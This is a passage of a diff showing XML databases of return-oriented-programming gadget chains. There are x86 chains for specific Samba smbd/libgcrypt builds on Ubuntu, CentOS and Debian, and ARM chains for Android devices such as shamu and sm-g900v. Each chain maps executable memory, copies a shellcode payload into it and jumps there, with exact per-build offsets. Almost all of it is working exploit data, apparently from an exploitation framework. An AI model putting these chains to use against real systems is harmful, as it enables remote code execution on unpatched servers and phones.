</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcrypt
|
||||
ii libgcrypt11 1.4.5-2ubuntu1 LGPL Crypto library - runtime library
|
||||
b6a20000-b6a91000 r-xp 00000000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
||||
b6a91000-b6a92000 r**p 00070000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
||||
b6a92000-b6a94000 rw-p 00071000 08:01 17247 /lib/libgcrypt.so.11.5.3
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00004634">pop ebx ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x00071ff4">offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072010">mmap@got - 4</gadget>
|
||||
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x0000922c">jmp eax</gadget>
|
||||
<gadget offset="0x00004631">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x000417af">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005d923">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x0005c47b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
|
||||
<gadget offset="0x0003dbd8">push esp ; and al, 0x0C ; call esi</gadget>
|
||||
<gadget offset="0x0006421f">pop eax ; ret</gadget>
|
||||
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x00053c64">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00043999">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072094">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x00043999">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<!-- set ecx to same value than edx -->
|
||||
<gadget offset="0x0006ea7f">xchg eax, esi ; ret || save eax</gadget>
|
||||
<gadget offset="0x0006421f">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
|
||||
<gadget offset="0x00016297">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
|
||||
<gadget offset="0x0005cd74"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x0006ea7f"> xchg eax, esi ; ret ; || restore eax</gadget>
|
||||
<gadget offset="0x00060e7a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00071ff4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00007e05">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x00058245">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x000128cc">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>3.5.10-0.107.el5 on CentOS 5</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
yum list |grep libgcrypt
|
||||
libgcrypt.i386 1.4.4-5.el5 installed
|
||||
02c63000-02ce1000 r-xp 00000000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
|
||||
02ce1000-02ce4000 rwxp 0007d000 fd:00 929390 /usr/lib/libgcrypt.so.11.5.2
|
||||
section is writable and executable, we'll copy the shellcode over there instead of using mmap
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x0005e842">pop eax ; pop ebx ; pop esi ; pop edi ; ret || eax = ret eip from call esi, ebx = esp, esi = edi = junk</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00028374">push esp ; and al, 0x08 ; mov dword [esp+0x04], 0x00000007 ; call esi</gadget>
|
||||
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00062c29">xchg eax, ebx ; ret || eax = esp</gadget>
|
||||
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
|
||||
<gadget value ="0x0000005c">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x0005a44d">add ecx, eax ; mov eax, ecx ; ret || eax = ecx = shellcode</gadget>
|
||||
<gadget offset="0x0006f5a1">pop edx ; inc ebx ; ret || set edx = to dst in memcpy for ret after pushad</gadget>
|
||||
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
|
||||
<gadget offset="0x0006a73f">pop eax ; ret</gadget>
|
||||
<gadget offset="0x0007effc">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x00015e47">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x00062c29">xchg eax, ebx ; ret || ebx = @memcpy</gadget>
|
||||
<gadget offset="0x0001704e">mov eax, ecx ; ret || eax = ecx = src in memcpy</gadget>
|
||||
<gadget offset="0x00004277">pop esi ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x0007ef54">esi = offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006299c">pop ecx ; ret</gadget>
|
||||
<gadget offset="0x00080800">offset of writable/executable memory (last 0x800 bytes)</gadget>
|
||||
<gadget offset="0x00007a2b">pop edi ; pop ebp ** 1 **; ret</gadget>
|
||||
<gadget offset="0x00004276">(P) pop ebx ; pop esi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1**</gadget>
|
||||
<gadget offset="0x0006200a">pushad ; ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
</rop>
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<!-- ROP CHAIN for smbd 2:3.5.11~dfsg-1ubuntu2
|
||||
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x0000f3b1">pop eax; ret</gadget>
|
||||
<gadget offset="0x00991ff0">mmap64@got</gadget>
|
||||
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
||||
<gadget offset="0x008c8997">jmp eax</gadget>
|
||||
<gadget offset="0x0009ee21">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
||||
<gadget offset="0x0034fbd2">pop edx ; ret</gadget>
|
||||
<gadget offset="0x0099a000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x0034c2bc">mov dword [edx], eax ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget offset="0x001fc04c">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x000a1d24">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x001e0d59">push esp ; pop ebx ; pop esi ; ret || ebx = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for esi</gadget>
|
||||
<gadget offset="0x0036fd9a">pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x001a73b2">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
|
||||
<gadget offset="0x0008c5ac">pop eax; ret</gadget>
|
||||
<gadget offset="0x00991904">memcpy@got</gadget>
|
||||
<gadget offset="0x002f3ea4">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x001726b5">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x006a3bba">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x000b64ec">add esp, 0x4 ; pop esi ; pop edi ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0002ab2c">pushad, ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
ROP CHAIN for smbd 2:3.5.8~dfsg-1ubuntu2
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x0000f445">pop eax; ret</gadget>
|
||||
<gadget offset="0x008c1008">mmap64@got</gadget>
|
||||
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
||||
<gadget offset="0x0009e8e4">jmp eax</gadget>
|
||||
<gadget offset="0x0009db61">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
||||
<gadget offset="0x001f6142">pop edx ; ret</gadget>
|
||||
<gadget offset="0x008c9000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00347b8c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x0021d553">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x001b1fe0">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x000e817f">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = esp</gadget>
|
||||
<gadget offset="0x00277540">pop ebp ; ret</gadget>
|
||||
<gadget value ="0x0000003c">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x0011d3a6">add eax, ebp ; mov ebx, 0x81FFF807 ; ret </gadget>
|
||||
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x0000f445">pop eax; ret</gadget>
|
||||
<gadget offset="0x008c0964">memcpy@got</gadget>
|
||||
<gadget offset="0x00348bb7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0000cdea">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x0009ee99">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x00148cc6">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0000dbcf">pushad, ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
-->
|
||||
<!-- ROP CHAIN for smbd 2:3.5.6~dfsg-3squeeze6
|
||||
<compatibility
|
||||
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
|
||||
</compatibility>
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00021cd9">pop eax; ret</gadget>
|
||||
<gadget offset="0x008cf86c">mmap64@got</gadget>
|
||||
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @mmap64</gadget>
|
||||
<gadget offset="0x000234e5">jmp eax</gadget>
|
||||
<gadget offset="0x000b0331">add esp, 0x14; pop ebx; pop ebp; ret || mmap64 ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 1</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off64_t part 2</gadget>
|
||||
<gadget offset="0x0001cf12">pop edx ; ret</gadget>
|
||||
<gadget offset="0x008d6000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x00353f4c">mov dword [edx], eax ; pop ebp ; ret; || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x000b98e9">mov ecx, eax; mov eax, ecx; ret || ecx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x006bffd2">mov edx, ecx ; mov eax, edx ; pop ebp ; ret || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x003660e4">push esp ; pop ebx ; pop ebp ; ret || ebx = esp</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp</gadget>
|
||||
<gadget offset="0x00394107">pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000034">value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x0017892d">add ebx, ebp ; ret || ebx = src in memcpy</gadget>
|
||||
<gadget offset="0x00021cd9">pop eax; ret</gadget>
|
||||
<gadget offset="0x008cf1e8">memcpy@got</gadget>
|
||||
<gadget offset="0x002fd4a7">mov eax, dword [eax] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x0001f666">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<gadget offset="0x000b9ac5">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x0033e7ea">add esp, 0x4 ; pop esi ; pop ebp ; ret || with pushad, will permit ret on ebx == memcpy</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x00020453">pushad, ret</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
-->
|
||||
</db>
|
|
@ -1,225 +0,0 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>lrx</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0xb66a0000">
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget offset="0x000042f9">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
||||
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
||||
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
||||
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
||||
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
||||
<gadget offset="0x001127b8">ptr to mmap64 (less 0x20)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="0xffffffff">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x00058e63">pop {r4, pc}</gadget>
|
||||
<gadget offset="0x00110438">ptr to memcpy (less 0x20)</gadget>
|
||||
<gadget offset="0x00061597">pop {r1, r2, r7, pc}</gadget>
|
||||
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
||||
<gadget value="size">memcpy length (payload size)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget value="junk">value to be skipped (r5)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0002fed3">bx r0</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>lmy-1</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0xb66a0000">
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget offset="0x000bfdbf">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
||||
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
||||
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
||||
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
||||
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
||||
<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="0xffffffff">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0000f379">pop {r4, pc}</gadget>
|
||||
<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
|
||||
<gadget offset="0x000a1251">pop {r1, r2, r7, pc}</gadget>
|
||||
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
||||
<gadget value="size">memcpy length (payload size)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget value="junk">value to be skipped (r5)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x000301a5">bx r0</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>lmy-2</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0xb66a0000">
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
||||
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
||||
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
||||
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
||||
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
||||
<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="0xffffffff">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0000f379">pop {r4, pc}</gadget>
|
||||
<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
|
||||
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
|
||||
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
||||
<gadget value="size">memcpy length (payload size)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget value="junk">value to be skipped (r5)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0000b3bd">bx r0</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>shamu / LYZ28E</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0xb66a0000">
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget offset="0x000bfe4f">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
||||
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
||||
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
||||
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
||||
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
||||
<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="0xffffffff">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x00044f71">pop {r4, pc}</gadget>
|
||||
<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
|
||||
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
|
||||
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
||||
<gadget value="size">memcpy length (payload size)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget value="junk">value to be skipped (r5)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0000f7cd">bx r0</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>shamu / LYZ28J</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0xb66a0000">
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
||||
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
||||
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
||||
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
||||
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
||||
<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="0xffffffff">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 fd</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x00044f71">pop {r4, pc}</gadget>
|
||||
<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
|
||||
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
|
||||
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
|
||||
<gadget value="size">memcpy length (payload size)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget value="junk">value to be skipped (r5)</gadget>
|
||||
<gadget value="junk">value to be skipped (r6)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x0000f83d">bx r0</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>sm-g900v / OE1</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0xb66a0000">
|
||||
<gadget value="junk">value to be skipped (r3)</gadget>
|
||||
<gadget value="junk">value to be skipped (r4)</gadget>
|
||||
<gadget offset="0x00092b85">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
|
||||
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
|
||||
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
|
||||
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
|
||||
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
|
||||
<gadget offset="0x0017af08">ptr to mmap64 (less 0x20)</gadget>
|
||||
<gadget value="junk">value to be skipped (r7)</gadget>
|
||||
<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
|
||||
<gadget value="0xffffffff">mmap64 fd</gadget>
|
||||
